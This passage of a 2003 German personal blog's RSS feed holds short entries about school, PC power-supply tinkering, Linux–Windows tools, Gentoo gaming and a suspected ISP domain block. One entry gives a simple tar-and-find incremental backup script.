  13697.    <guid isPermaLink="true"></guid>
  13698.    <dc:creator>Andreas Jaggi</dc:creator>
  13699.    <creativeCommons:license></creativeCommons:license>
  13700.    <pubDate>Wed, 12 Mar 2003 14:07:00 +0100</pubDate>
  13701.    <category domain="">School</category>
  13702.    <description><![CDATA[Dies und weiteres solches Zeugs heben wir gerade im Physik durchgenommen. Und im übertragenen Sinn könnte ich es auch gerade auf mein momentanes Leben anwenden.<br>Letzte Woche hatte ich die ganze Zeit Proben und diese Woche kommt es so, dass andauernd Lektionen ausfallen und ich pro Tag manchmal nur gerade 2 Lektionen in die Schule gehe und mich dann wieder nach Hause begeben kann. Bei einem einstündigen Schulweg, ist also die für die Schule aufgewendete Tara-Zeit grösser als die Netto-Zeit!
  13703. ]]></description>
  13704.    <content:encoded><![CDATA[Dies und weiteres solches Zeugs heben wir gerade im Physik durchgenommen. Und im übertragenen Sinn könnte ich es auch gerade auf mein momentanes Leben anwenden.<br>Letzte Woche hatte ich die ganze Zeit Proben und diese Woche kommt es so, dass andauernd Lektionen ausfallen und ich pro Tag manchmal nur gerade 2 Lektionen in die Schule gehe und mich dann wieder nach Hause begeben kann. Bei einem einstündigen Schulweg, ist also die für die Schule aufgewendete Tara-Zeit grösser als die Netto-Zeit!
  13705. ]]></content:encoded>
  13706.  </item>
  13708.  <item>
  13709.    <title>Schule und so</title>
  13710.    <link></link>
  13711.    <guid isPermaLink="true"></guid>
  13712.    <dc:creator>Andreas Jaggi</dc:creator>
  13713.    <creativeCommons:license></creativeCommons:license>
  13714.    <pubDate>Thu, 06 Mar 2003 01:06:00 +0100</pubDate>
  13715.    <category domain="">Misc</category>
  13716.    <description><![CDATA[Ich bin wieder einmal einen 'Vortrag' am vorbereiten, diesmal in Geschichte, dass ich ja bekanntlich auf französisch durchexerziere ;-)<br><br>Und wie alle sicher schon wissen, bin ich wieder einmal besonders früh besonders weit. Sprich: ich habe jetzt erst einen Drittel gemacht und muss um 5 Uhr schon wieder aufstehen...<br><br>So, nun ist genug Selbstmitleid geflossen, jetzt sollte ich wieder weitermachen.<br><br><a href=""><b>Hier</b></a> hats viele lustige Mods. Vielleicht sollte ich noch erwähnen, dass ich erstmals an meinem Computer herumgelötet hab, genauer am Netzteil. Ich hab nämlich die Lüfter rausgelötet und zwei superleise 12db-1500rpm-Papst-Lüfter reingelötet. Und, das Überraschendste: es läuft noch und zwar angenehm leise *g*
  13717. ]]></description>
  13718.    <content:encoded><![CDATA[Ich bin wieder einmal einen 'Vortrag' am vorbereiten, diesmal in Geschichte, dass ich ja bekanntlich auf französisch durchexerziere ;-)<br><br>Und wie alle sicher schon wissen, bin ich wieder einmal besonders früh besonders weit. Sprich: ich habe jetzt erst einen Drittel gemacht und muss um 5 Uhr schon wieder aufstehen...<br><br>So, nun ist genug Selbstmitleid geflossen, jetzt sollte ich wieder weitermachen.<br><br><a href=""><b>Hier</b></a> hats viele lustige Mods. Vielleicht sollte ich noch erwähnen, dass ich erstmals an meinem Computer herumgelötet hab, genauer am Netzteil. Ich hab nämlich die Lüfter rausgelötet und zwei superleise 12db-1500rpm-Papst-Lüfter reingelötet. Und, das Überraschendste: es läuft noch und zwar angenehm leise *g*
  13719. ]]></content:encoded>
  13720.  </item>
  13722.  <item>
  13723.    <title>Nachtrag zu Linux - Windows</title>
  13724.    <link></link>
  13725.    <guid isPermaLink="true"></guid>
  13726.    <dc:creator>Andreas Jaggi</dc:creator>
  13727.    <creativeCommons:license></creativeCommons:license>
  13728.    <pubDate>Sat, 01 Mar 2003 20:21:00 +0100</pubDate>
  13729.    <category domain="">Linux</category>
  13730.    <description><![CDATA[Nach kurzem Testen muss ich ein Lob für <a href="">Ext2Fsd (Ext2 File System Driver)<b></b></a> schreiben. Damit und mit dem dabei mitgebrachten mount-Utility kann man eine Ext2/3-Partition ganz einfach mit einem beliebigen Laufwerksbuchstaben quasi in den 'Arbeitsplatz' mounten ;-)<br>Natürlich funktioniert das auch mit Win-Partitionen.<br><br>Desweiteren werde ich gleich <a href=""><b>SwapFs</b></a> ausprobieren, das eine Linux-Swap-Partition unter Windows dem Auslagerungsspeicher zur Verfügung stellen soll.<br><br>Und vielleicht kann jemand <a href=""><b>dieses Tutorial (Booting Linux from the NT boot loader)</b></a> gebrauchen, ich habe mich für GRUB entschieden :-)
  13731. ]]></description>
  13732.    <content:encoded><![CDATA[Nach kurzem Testen muss ich ein Lob für <a href="">Ext2Fsd (Ext2 File System Driver)<b></b></a> schreiben. Damit und mit dem dabei mitgebrachten mount-Utility kann man eine Ext2/3-Partition ganz einfach mit einem beliebigen Laufwerksbuchstaben quasi in den 'Arbeitsplatz' mounten ;-)<br>Natürlich funktioniert das auch mit Win-Partitionen.<br><br>Desweiteren werde ich gleich <a href=""><b>SwapFs</b></a> ausprobieren, das eine Linux-Swap-Partition unter Windows dem Auslagerungsspeicher zur Verfügung stellen soll.<br><br>Und vielleicht kann jemand <a href=""><b>dieses Tutorial (Booting Linux from the NT boot loader)</b></a> gebrauchen, ich habe mich für GRUB entschieden :-)
  13733. ]]></content:encoded>
  13734.  </item>
  13736.  <item>
  13737.    <title>Nochetwas Linux-Windows</title>
  13738.    <link></link>
  13739.    <guid isPermaLink="true"></guid>
  13740.    <dc:creator>Andreas Jaggi</dc:creator>
  13741.    <creativeCommons:license></creativeCommons:license>
  13742.    <pubDate>Sat, 01 Mar 2003 19:52:00 +0100</pubDate>
  13743.    <category domain="">Linux</category>
  13744.    <description><![CDATA[<a href=""><b>Explore2fds</b></a> ist ein Windows-Explorer ähnlicher Dateimanager für ext2/3 Partitionen für Windows oder so ;-)<br><br>Sehr nützlich!
  13745. ]]></description>
  13746.    <content:encoded><![CDATA[<a href=""><b>Explore2fds</b></a> ist ein Windows-Explorer ähnlicher Dateimanager für ext2/3 Partitionen für Windows oder so ;-)<br><br>Sehr nützlich!
  13747. ]]></content:encoded>
  13748.  </item>
  13750.  <item>
  13751.    <title>Linux - Windows</title>
  13752.    <link></link>
  13753.    <guid isPermaLink="true"></guid>
  13754.    <dc:creator>Andreas Jaggi</dc:creator>
  13755.    <creativeCommons:license></creativeCommons:license>
  13756.    <pubDate>Sat, 01 Mar 2003 19:47:00 +0100</pubDate>
  13757.    <category domain="">Linux</category>
  13758.    <description><![CDATA[Da ich ja momentan nur mit einer alten Windowsinstallation arbeiten kann, habe ich mich wieder einmal ein bisschen umgeschaut, was für Tools es gibt, damit sich Windows und Linux näher kommen.<br>Auf <a href=""><b>dieser Liste</b></a> habe ich einige gefunden:<br><br>- <a href=""><b>Partition Image für Linux</b></a><br>- <a href=""><b>Ext2fsprogs</b></a> wovon es auch für Windows eine <a href=""><b>Treiber gibt</b></a> siehe auch <a href=""><b>hier</b></a><br>- <a href=""><b>Linux-NTFS Project</b></a><br>- <a href=""><b>'Netzwerkumgebung' für Windows</b></a>
  13759. ]]></description>
  13760.    <content:encoded><![CDATA[Da ich ja momentan nur mit einer alten Windowsinstallation arbeiten kann, habe ich mich wieder einmal ein bisschen umgeschaut, was für Tools es gibt, damit sich Windows und Linux näher kommen.<br>Auf <a href=""><b>dieser Liste</b></a> habe ich einige gefunden:<br><br>- <a href=""><b>Partition Image für Linux</b></a><br>- <a href=""><b>Ext2fsprogs</b></a> wovon es auch für Windows eine <a href=""><b>Treiber gibt</b></a> siehe auch <a href=""><b>hier</b></a><br>- <a href=""><b>Linux-NTFS Project</b></a><br>- <a href=""><b>'Netzwerkumgebung' für Windows</b></a>
  13761. ]]></content:encoded>
  13762.  </item>
  13764.  <item>
  13765.    <title>Gentoo Linux 1.4_rc3 Released</title>
  13766.    <link></link>
  13767.    <guid isPermaLink="true"></guid>
  13768.    <dc:creator>Andreas Jaggi</dc:creator>
  13769.    <creativeCommons:license></creativeCommons:license>
  13770.    <pubDate>Thu, 27 Feb 2003 16:26:00 +0100</pubDate>
  13771.    <category domain="">Linux</category>
  13772.    <description><![CDATA[<a href=""><b>Gentoo</b></a> 1.4_rc3 ist <a href=""><b>da</b></a>!
  13773. ]]></description>
  13774.    <content:encoded><![CDATA[<a href=""><b>Gentoo</b></a> 1.4_rc3 ist <a href=""><b>da</b></a>!
  13775. ]]></content:encoded>
  13776.  </item>
  13778.  <item>
  13779.    <title>Ich hab mir wieder einmal Mühe gegeben</title>
  13780.    <link></link>
  13781.    <guid isPermaLink="true"></guid>
  13782.    <dc:creator>Andreas Jaggi</dc:creator>
  13783.    <creativeCommons:license></creativeCommons:license>
  13784.    <pubDate>Wed, 26 Feb 2003 15:24:00 +0100</pubDate>
  13785.    <category domain="">Tech</category>
  13786.    <description><![CDATA[Wenn bei einer Option für einen Befehl '(DANGEROUS)' steht, sollte auch der liebenswerte und neugierige Herr Jaggi ein bisschen Vernunft erhaschen und zuerst denken, dann handeln, denn sonst kommt es so, dass er die Festplatte auf UDMA-5 stellt, was nicht funktionieren kann, und dann seine ganze $HOME-Partition (und auch noch ein paar andere) zerlöchert!<br><br>Natürlich liegt das letzte Backup (Ja, ich bin ein FEigling ;-) schon über 2 Wochen zurück und  nützt auch nicht wirklich viel!
  13787. ]]></description>
  13788.    <content:encoded><![CDATA[Wenn bei einer Option für einen Befehl '(DANGEROUS)' steht, sollte auch der liebenswerte und neugierige Herr Jaggi ein bisschen Vernunft erhaschen und zuerst denken, dann handeln, denn sonst kommt es so, dass er die Festplatte auf UDMA-5 stellt, was nicht funktionieren kann, und dann seine ganze $HOME-Partition (und auch noch ein paar andere) zerlöchert!<br><br>Natürlich liegt das letzte Backup (Ja, ich bin ein FEigling ;-) schon über 2 Wochen zurück und  nützt auch nicht wirklich viel!
  13789. ]]></content:encoded>
  13790.  </item>
  13792.  <item>
  13793.    <title>sec ist zurück</title>
  13794.    <link></link>
  13795.    <guid isPermaLink="true"></guid>
  13796.    <dc:creator>Andreas Jaggi</dc:creator>
  13797.    <creativeCommons:license></creativeCommons:license>
  13798.    <pubDate>Fri, 21 Feb 2003 15:17:00 +0100</pubDate>
  13799.    <category domain="">Misc</category>
  13800.    <description><![CDATA[<a href=""><b>da!</b></a>
  13801. ]]></description>
  13802.    <content:encoded><![CDATA[<a href=""><b>da!</b></a>
  13803. ]]></content:encoded>
  13804.  </item>
  13806.  <item>
  13807.    <title>noch zu Zensur</title>
  13808.    <link></link>
  13809.    <guid isPermaLink="true"></guid>
  13810.    <dc:creator>Andreas Jaggi</dc:creator>
  13811.    <creativeCommons:license></creativeCommons:license>
  13812.    <pubDate>Fri, 21 Feb 2003 02:57:00 +0100</pubDate>
  13813.    <category domain="">Networking</category>
  13814.    <description><![CDATA[E-Mail Abrufen etc. geht natürlich auch nicht, da die Domain laut Mozilla gar nicht existiert. und ein 'ping' ergibt nur 'ping: unknown host' :-(<br><br>Warum, Warum, WWAAARRUUUMM ???
  13815. ]]></description>
  13816.    <content:encoded><![CDATA[E-Mail Abrufen etc. geht natürlich auch nicht, da die Domain laut Mozilla gar nicht existiert. und ein 'ping' ergibt nur 'ping: unknown host' :-(<br><br>Warum, Warum, WWAAARRUUUMM ???
  13817. ]]></content:encoded>
  13818.  </item>
  13820.  <item>
  13821.    <title>Zensur?</title>
  13822.    <link></link>
  13823.    <guid isPermaLink="true"></guid>
  13824.    <dc:creator>Andreas Jaggi</dc:creator>
  13825.    <creativeCommons:license></creativeCommons:license>
  13826.    <pubDate>Fri, 21 Feb 2003 02:40:00 +0100</pubDate>
  13827.    <category domain="">Networking</category>
  13828.    <description><![CDATA[Ich kann <a href=""><b></b></a> und jegliche Domains die darauf umgeleitet werden von zu Hause aus nicht mehr erreichen! Auch andere Domains (<a href="#" class="gone"><b></b></a>, <a href=""><b></b></a>) kann ich nicht erreichen, resp. kann mein PC nicht finden!<br><br>Wenn ich jedoch mit einem 'Anonymisierer' (<a href=""><b></b></a>) darauf zugreife, funktioniert alles problemlos (z.B. dieses Posting).<br><br>Kann mir bitte jemand (möglichst viele *g*) mitteilen, ob die genannten Domains auch bei anderen Leuten nicht erreichbar sind. Ich vermute nämlich, dass <a href=""><b>Solnet</b></a> irgend einem richterlichen Befehl folgt und das Internet nur <b><span style="font-size: larger">zensiert</span></b> ausliefert! Frage mich nur, was die obgenannten Domains so böses angestellt haben, damit sie versteckt werden müssen...
  13829. ]]></description>
  13830.    <content:encoded><![CDATA[Ich kann <a href=""><b></b></a> und jegliche Domains die darauf umgeleitet werden von zu Hause aus nicht mehr erreichen! Auch andere Domains (<a href="#" class="gone"><b></b></a>, <a href=""><b></b></a>) kann ich nicht erreichen, resp. kann mein PC nicht finden!<br><br>Wenn ich jedoch mit einem 'Anonymisierer' (<a href=""><b></b></a>) darauf zugreife, funktioniert alles problemlos (z.B. dieses Posting).<br><br>Kann mir bitte jemand (möglichst viele *g*) mitteilen, ob die genannten Domains auch bei anderen Leuten nicht erreichbar sind. Ich vermute nämlich, dass <a href=""><b>Solnet</b></a> irgend einem richterlichen Befehl folgt und das Internet nur <b><span style="font-size: larger">zensiert</span></b> ausliefert! Frage mich nur, was die obgenannten Domains so böses angestellt haben, damit sie versteckt werden müssen...
  13831. ]]></content:encoded>
  13832.  </item>
  13834.  <item>
  13835.    <title>Armee</title>
  13836.    <link></link>
  13837.    <guid isPermaLink="true"></guid>
  13838.    <dc:creator>Andreas Jaggi</dc:creator>
  13839.    <creativeCommons:license></creativeCommons:license>
  13840.    <pubDate>Thu, 20 Feb 2003 11:05:00 +0100</pubDate>
  13841.    <category domain="">Misc</category>
  13842.    <description><![CDATA[So siehts aus:<br><a href=""><img src="" width="100" height="70" alt="Auszug ausm Dienstbüchlein"></a>
  13843. ]]></description>
  13844.    <content:encoded><![CDATA[So siehts aus:<br><a href=""><img src="" width="100" height="70" alt="Auszug ausm Dienstbüchlein"></a>
  13845. ]]></content:encoded>
  13846.  </item>
  13848.  <item>
  13849.    <title>Rekrutierung</title>
  13850.    <link></link>
  13851.    <guid isPermaLink="true"></guid>
  13852.    <dc:creator>Andreas Jaggi</dc:creator>
  13853.    <creativeCommons:license></creativeCommons:license>
  13854.    <pubDate>Tue, 18 Feb 2003 17:58:00 +0100</pubDate>
  13855.    <category domain="">Misc</category>
  13856.    <description><![CDATA[Nun schreibe ich mit einer voll scheisse Steinzeit-Tastatur. Und die Internetzeit läuft gleich ab. Hab gerade 2 Psychotests in Rekordzeit absolviert ;-)
  13857. ]]></description>
  13858.    <content:encoded><![CDATA[Nun schreibe ich mit einer voll scheisse Steinzeit-Tastatur. Und die Internetzeit läuft gleich ab. Hab gerade 2 Psychotests in Rekordzeit absolviert ;-)
  13859. ]]></content:encoded>
  13860.  </item>
  13862.  <item>
  13863.    <title>Netzteil-Tweaking ?</title>
  13864.    <link></link>
  13865.    <guid isPermaLink="true"></guid>
  13866.    <dc:creator>Andreas Jaggi</dc:creator>
  13867.    <creativeCommons:license></creativeCommons:license>
  13868.    <pubDate>Sun, 16 Feb 2003 11:24:00 +0100</pubDate>
  13869.    <category domain="">Tech</category>
  13870.    <description><![CDATA[Nachdem ich letzte Woche infolge angehäufer Proben, kaum Zeit hatte, den Computer einzuschalten, hat er sich gestern gerächt!<br><br>Mein Netzteil het nun irgendein Problem mit dem Temperatursensor. Kaum habe ich den Computer eingeschaltet und Linux gestartet, so beginnt der temperaturgesteuerte Netzteillüfter auf höchster Drehzahl zu laufen, was einen SEHR lauten Lärm verursacht!<br><br>Ich hab mich mal ein bisschen umgeschaut und <a href=""><b>diesen Review</b></a> gefunden, indem auch der Temperatursensor thematisiert wird. In den <a href=";artikel_id=144"><b>Kommentaren</b></a> wird gesagt, dass man problemlos einen Widerstand einbauen kann, der die Empfindlichkeit des Sensors dämpft.<br><br>Nun brauche ich noch nen Widerstand mit  1.5 Watt / 68 Ohm. Da ich sowieso nächste Woche noch Elektrizitätslehre repetieren muss, wird das wohl ne schöne praxisnahe Übung ;-)<br><br>Und Falls ich nächste Woche hier nichts mehr schreibe, so hab ich entweder falsch rumgebastelt, oder die von der Armee haben mich bei der Aushebung irgendwie malträtiert ;-)
  13871. ]]></description>
  13872.    <content:encoded><![CDATA[Nachdem ich letzte Woche infolge angehäufer Proben, kaum Zeit hatte, den Computer einzuschalten, hat er sich gestern gerächt!<br><br>Mein Netzteil het nun irgendein Problem mit dem Temperatursensor. Kaum habe ich den Computer eingeschaltet und Linux gestartet, so beginnt der temperaturgesteuerte Netzteillüfter auf höchster Drehzahl zu laufen, was einen SEHR lauten Lärm verursacht!<br><br>Ich hab mich mal ein bisschen umgeschaut und <a href=""><b>diesen Review</b></a> gefunden, indem auch der Temperatursensor thematisiert wird. In den <a href=";artikel_id=144"><b>Kommentaren</b></a> wird gesagt, dass man problemlos einen Widerstand einbauen kann, der die Empfindlichkeit des Sensors dämpft.<br><br>Nun brauche ich noch nen Widerstand mit  1.5 Watt / 68 Ohm. Da ich sowieso nächste Woche noch Elektrizitätslehre repetieren muss, wird das wohl ne schöne praxisnahe Übung ;-)<br><br>Und Falls ich nächste Woche hier nichts mehr schreibe, so hab ich entweder falsch rumgebastelt, oder die von der Armee haben mich bei der Aushebung irgendwie malträtiert ;-)
  13873. ]]></content:encoded>
  13874.  </item>
  13876.  <item>
  13877.    <title>Yeehaw!</title>
  13878.    <link></link>
  13879.    <guid isPermaLink="true"></guid>
  13880.    <dc:creator>Andreas Jaggi</dc:creator>
  13881.    <creativeCommons:license></creativeCommons:license>
  13882.    <pubDate>Sun, 09 Feb 2003 01:36:00 +0100</pubDate>
  13883.    <category domain="">Linux</category>
  13884.    <description><![CDATA[<img src="" width="240" height="161" alt="Altersbeschränkung von UT2003"><br><br>Dies ist die aufs UT2003 aufgedruckte Altersbeschränkung, aber um die gehts in diesem Eintrag gar nicht, denn um diese Alterbeschränkung hier zeigen zu können, musste ich sie zuerst scannen und darum gehts.<br>Beim rumsurfen bin ich auf <a href=""><b>dieses Tutorial</b></a> von <a href=""><b></b></a> gestossen. Da ich einen HP PSC 950 Drucker, Scanner, Fax, Kopierer, Media-Card-Reader besitze, und ich zuerst annahm, dass der garnicht mit Linux zusammenarbeitet, war ich schon sehr glücklich, als ich den Drucker zum Laufen brachte. Von dem Tutorial angeregt, hab ich mich nocheinmal dahintergesetzt und nach langem und sehr intensivem Basteln (Drucker in CUPS entfernen, CUPS stoppen, HPOJS installieren, PPD File neu generieren, HPOJS Starten, HPOJS Konfigurieren, CUPS Starten, Drucker in CUPS wieder einrichten, schauen ob was erkennt wird, Scanner ja, Drucker nein (??), nocheinmal (und noch viele male mehr) alles von vorne ... ) geschafft, dass ich nun auch unter Linux Scannen kann, den Beweis seht ihr ja. <br>So, mal schauen ob wir den eingebauten Media-Card-Reader auch noch zum Leben erwecken können ...
  13885. ]]></description>
  13886.    <content:encoded><![CDATA[<img src="" width="240" height="161" alt="Altersbeschränkung von UT2003"><br><br>Dies ist die aufs UT2003 aufgedruckte Altersbeschränkung, aber um die gehts in diesem Eintrag gar nicht, denn um diese Alterbeschränkung hier zeigen zu können, musste ich sie zuerst scannen und darum gehts.<br>Beim rumsurfen bin ich auf <a href=""><b>dieses Tutorial</b></a> von <a href=""><b></b></a> gestossen. Da ich einen HP PSC 950 Drucker, Scanner, Fax, Kopierer, Media-Card-Reader besitze, und ich zuerst annahm, dass der garnicht mit Linux zusammenarbeitet, war ich schon sehr glücklich, als ich den Drucker zum Laufen brachte. Von dem Tutorial angeregt, hab ich mich nocheinmal dahintergesetzt und nach langem und sehr intensivem Basteln (Drucker in CUPS entfernen, CUPS stoppen, HPOJS installieren, PPD File neu generieren, HPOJS Starten, HPOJS Konfigurieren, CUPS Starten, Drucker in CUPS wieder einrichten, schauen ob was erkennt wird, Scanner ja, Drucker nein (??), nocheinmal (und noch viele male mehr) alles von vorne ... ) geschafft, dass ich nun auch unter Linux Scannen kann, den Beweis seht ihr ja. <br>So, mal schauen ob wir den eingebauten Media-Card-Reader auch noch zum Leben erwecken können ...
  13887. ]]></content:encoded>
  13888.  </item>
  13890.  <item>
  13891.    <title>Das fehlt</title>
  13892.    <link></link>
  13893.    <guid isPermaLink="true"></guid>
  13894.    <dc:creator>Andreas Jaggi</dc:creator>
  13895.    <creativeCommons:license></creativeCommons:license>
  13896.    <pubDate>Sat, 08 Feb 2003 20:19:00 +0100</pubDate>
  13897.    <category domain="">Misc</category>
  13898.    <description><![CDATA[<img src="" width="200" height="260" alt="Will fix your Computer for sex"><br><br>Gefunden bei <a href=""><b>Kasia</b></a>.
  13899. ]]></description>
  13900.    <content:encoded><![CDATA[<img src="" width="200" height="260" alt="Will fix your Computer for sex"><br><br>Gefunden bei <a href=""><b>Kasia</b></a>.
  13901. ]]></content:encoded>
  13902.  </item>
  13904.  <item>
  13905.    <title>GSM-Handys schädigen Nervenzellen</title>
  13906.    <link></link>
  13907.    <guid isPermaLink="true"></guid>
  13908.    <dc:creator>Andreas Jaggi</dc:creator>
  13909.    <creativeCommons:license></creativeCommons:license>
  13910.    <pubDate>Fri, 07 Feb 2003 16:45:00 +0100</pubDate>
  13911.    <category domain="">Misc</category>
  13912.    <description><![CDATA[Ich habs ja schon immer gesagt. <a href=""><b>Selber schauen.</b></a>
  13913. ]]></description>
  13914.    <content:encoded><![CDATA[Ich habs ja schon immer gesagt. <a href=""><b>Selber schauen.</b></a>
  13915. ]]></content:encoded>
  13916.  </item>
  13918.  <item>
  13919.    <title>zeugs</title>
  13920.    <link></link>
  13921.    <guid isPermaLink="true"></guid>
  13922.    <dc:creator>Andreas Jaggi</dc:creator>
  13923.    <creativeCommons:license></creativeCommons:license>
  13924.    <pubDate>Thu, 06 Feb 2003 18:51:00 +0100</pubDate>
  13925.    <category domain="">Linux</category>
  13926.    <description><![CDATA[<a href=""><b>rw</b></a> hat wiedereinmal ein paar nützliche tutorials aufgestöbert/geschrieben:<br>- <a href=""><b>Better Ad Blocking for Mozilla and Netscape 7</b></a><br>- <a href=""><b>RPM- und TGZ-Paket erzeugen mit Checkinstall</b></a><br>- <a href=""><b>GnuPG - Quick 'n' dirty</b></a>
  13927. ]]></description>
  13928.    <content:encoded><![CDATA[<a href=""><b>rw</b></a> hat wiedereinmal ein paar nützliche tutorials aufgestöbert/geschrieben:<br>- <a href=""><b>Better Ad Blocking for Mozilla and Netscape 7</b></a><br>- <a href=""><b>RPM- und TGZ-Paket erzeugen mit Checkinstall</b></a><br>- <a href=""><b>GnuPG - Quick 'n' dirty</b></a>
  13929. ]]></content:encoded>
  13930.  </item>
  13932.  <item>
  13933.    <title>*gähn*</title>
  13934.    <link></link>
  13935.    <guid isPermaLink="true"></guid>
  13936.    <dc:creator>Andreas Jaggi</dc:creator>
  13937.    <creativeCommons:license></creativeCommons:license>
  13938.    <pubDate>Mon, 03 Feb 2003 02:22:00 +0100</pubDate>
  13939.    <category domain="">Misc</category>
  13940.    <description><![CDATA[so jetzt ist 2:22:22 und ich geh jetzt schlafen ;-)
  13941. ]]></description>
  13942.    <content:encoded><![CDATA[so jetzt ist 2:22:22 und ich geh jetzt schlafen ;-)
  13943. ]]></content:encoded>
  13944.  </item>
  13946.  <item>
  13947.    <title>Wein</title>
  13948.    <link></link>
  13949.    <guid isPermaLink="true"></guid>
  13950.    <dc:creator>Andreas Jaggi</dc:creator>
  13951.    <creativeCommons:license></creativeCommons:license>
  13952.    <pubDate>Mon, 03 Feb 2003 01:24:00 +0100</pubDate>
  13953.    <category domain="">Linux</category>
  13954.    <description><![CDATA[Mit <a href=""><b>Wine</b></a> kann man so lustige Sachen wie <a href=""><b>diese</b></a> machen.<br>So, noch ein bisschen basteln, vielleicht krieg ich ja Fireworks so zum laufen :-)
  13955. ]]></description>
  13956.    <content:encoded><![CDATA[Mit <a href=""><b>Wine</b></a> kann man so lustige Sachen wie <a href=""><b>diese</b></a> machen.<br>So, noch ein bisschen basteln, vielleicht krieg ich ja Fireworks so zum laufen :-)
  13957. ]]></content:encoded>
  13958.  </item>
  13960.  <item>
  13961.    <title>Zuerst das Vergnügen dann nix mehr ;-)</title>
  13962.    <link></link>
  13963.    <guid isPermaLink="true"></guid>
  13964.    <dc:creator>Andreas Jaggi</dc:creator>
  13965.    <creativeCommons:license></creativeCommons:license>
  13966.    <pubDate>Sun, 02 Feb 2003 01:11:00 +0100</pubDate>
  13967.    <category domain="">Linux</category>
  13968.    <description><![CDATA[Nebst UT und UT2003 läuft jetzt auch Quake3A :-)
  13969. ]]></description>
  13970.    <content:encoded><![CDATA[Nebst UT und UT2003 läuft jetzt auch Quake3A :-)
  13971. ]]></content:encoded>
  13972.  </item>
  13974.  <item>
  13975.    <title>Backup, besser</title>
  13976.    <link></link>
  13977.    <guid isPermaLink="true"></guid>
  13978.    <dc:creator>Andreas Jaggi</dc:creator>
  13979.    <creativeCommons:license></creativeCommons:license>
  13980.    <pubDate>Sat, 01 Feb 2003 16:10:00 +0100</pubDate>
  13981.    <category domain="">Linux</category>
  13982.    <description><![CDATA[Leider kommt das gepostete Script nicht mit Ordnernamen, die mit Spaces vermurkst sind (ja genau, von Windows), zurecht. Wenn man nun zuerst die Ergebnisse von find ... in eine Datei speichert (mit -fprint Datei) und diese dann dem tar ... übergibt (mit --files-from=Datei) funktionierts! Evtl. muss man noch mittels --exclude=Datei diese Hilfsdatei vorm tar verstecken ;-)
  13983. ]]></description>
  13984.    <content:encoded><![CDATA[Leider kommt das gepostete Script nicht mit Ordnernamen, die mit Spaces vermurkst sind (ja genau, von Windows), zurecht. Wenn man nun zuerst die Ergebnisse von find ... in eine Datei speichert (mit -fprint Datei) und diese dann dem tar ... übergibt (mit --files-from=Datei) funktionierts! Evtl. muss man noch mittels --exclude=Datei diese Hilfsdatei vorm tar verstecken ;-)
  13985. ]]></content:encoded>
  13986.  </item>
  13988.  <item>
  13989.    <title>Backup</title>
  13990.    <link></link>
  13991.    <guid isPermaLink="true"></guid>
  13992.    <dc:creator>Andreas Jaggi</dc:creator>
  13993.    <creativeCommons:license></creativeCommons:license>
  13994.    <pubDate>Sat, 01 Feb 2003 03:05:00 +0100</pubDate>
  13995.    <category domain="">Linux</category>
  13996.    <description><![CDATA[Ich hab mich mal ein bisschen mit inkrementellem Backup beschäftigt. Rausgekommen ist das hier, vielleicht kanns ja sonst noch jemand gebrauchen.<pre>today=`date +%d%b%Y`
  13997. backup_path=/backup
  13998. tar -cvf $backup_path/backup_$today.tar `find /home /www /root -newer $backup_path ! -name *~ ! -type d -print` > $backup_path/backup_$today.toc</pre>
  13999. Dieses Shellscript macht ein tar-file mit den Dateien aus /home, /www und /root, die seit dem letzten Backup verändert wurden und legt dieses unter /backup ab inklusive einer Inhaltsangabe :-)
  14000. ]]></description>
  14001.    <content:encoded><![CDATA[Ich hab mich mal ein bisschen mit inkrementellem Backup beschäftigt. Rausgekommen ist das hier, vielleicht kanns ja sonst noch jemand gebrauchen.<pre>today=`date +%d%b%Y`
  14002. backup_path=/backup
  14003. tar -cvf $backup_path/backup_$today.tar `find /home /www /root -newer $backup_path ! -name *~ ! -type d -print` > $backup_path/backup_$today.toc</pre>
  14004. Dieses Shellscript macht ein tar-file mit den Dateien aus /home, /www und /root, die seit dem letzten Backup verändert wurden und legt dieses unter /backup ab inklusive einer Inhaltsangabe :-)
  14005. ]]></content:encoded>
  14006.  </item>
  14008.  <item>
  14009.    <title>Die Aussicht geniessen</title>
  14010.    <link></link>
  14011.    <guid isPermaLink="true"></guid>
  14012.    <dc:creator>Andreas Jaggi</dc:creator>
  14013.    <creativeCommons:license></creativeCommons:license>
  14014.    <pubDate>Fri, 31 Jan 2003 03:25:00 +0100</pubDate>
  14015.    <category domain="">Misc</category>
  14016.    <description><![CDATA[<a href=""><img src="" width="160" height="120" alt="Screenshot aus UT2003 - Klick für grösser"></a><a href=""><img src="" width="160" height="120" alt="Screenshot aus UT2003 - Klick für grösser"></a>
  14017. ]]></description>
  14018.    <content:encoded><![CDATA[<a href=""><img src="" width="160" height="120" alt="Screenshot aus UT2003 - Klick für grösser"></a><a href=""><img src="" width="160" height="120" alt="Screenshot aus UT2003 - Klick für grösser"></a>
  14019. ]]></content:encoded>
  14020.  </item>
  14022.  <item>
  14023.    <title>UT-ig</title>
  14024.    <link></link>
  14025.    <guid isPermaLink="true"></guid>
  14026.    <dc:creator>Andreas Jaggi</dc:creator>
  14027.    <creativeCommons:license></creativeCommons:license>
  14028.    <pubDate>Wed, 29 Jan 2003 15:36:00 +0100</pubDate>
  14029.    <category domain="">Linux</category>
  14030.    <description><![CDATA[Jetzt läuft nebst UT auch UT2003 mit Gentoo :-)<br>Screenshots und Framerates gibts (noch) nicht ;-P
  14031. ]]></description>
  14032.    <content:encoded><![CDATA[Jetzt läuft nebst UT auch UT2003 mit Gentoo :-)<br>Screenshots und Framerates gibts (noch) nicht ;-P
  14033. ]]></content:encoded>
  14034.  </item>
  14036.  <item>
  14037.    <title>Laaaaaaaaaaaag !!!</title>
  14038.    <link></link>
  14039.    <guid isPermaLink="true"></guid>
  14040.    <dc:creator>Andreas Jaggi</dc:creator>
  14041.    <creativeCommons:license></creativeCommons:license>
  14042.    <pubDate>Mon, 27 Jan 2003 22:05:00 +0100</pubDate>
  14043.    <category domain="">Networking</category>
  14044.    <description><![CDATA[würde es an einer LAN heissen.<br>Das Internet lahmt momentan teilweise wie Sau und es liegt vermutlich <a href=""><b>daran</b></a>, da ich nicht wie <a href=""><b>andere</b></a> mit T-Dings ins Netz gehe *hehe*
  14045. ]]></description>
  14046.    <content:encoded><![CDATA[würde es an einer LAN heissen.<br>Das Internet lahmt momentan teilweise wie Sau und es liegt vermutlich <a href=""><b>daran</b></a>, da ich nicht wie <a href=""><b>andere</b></a> mit T-Dings ins Netz gehe *hehe*
  14047. ]]></content:encoded>
  14048.  </item>
  14050.  <item>
  14051.    <title>Hammer</title>
  14052.    <link></link>
  14053.    <guid isPermaLink="true"></guid>
  14054.    <dc:creator>Andreas Jaggi</dc:creator>
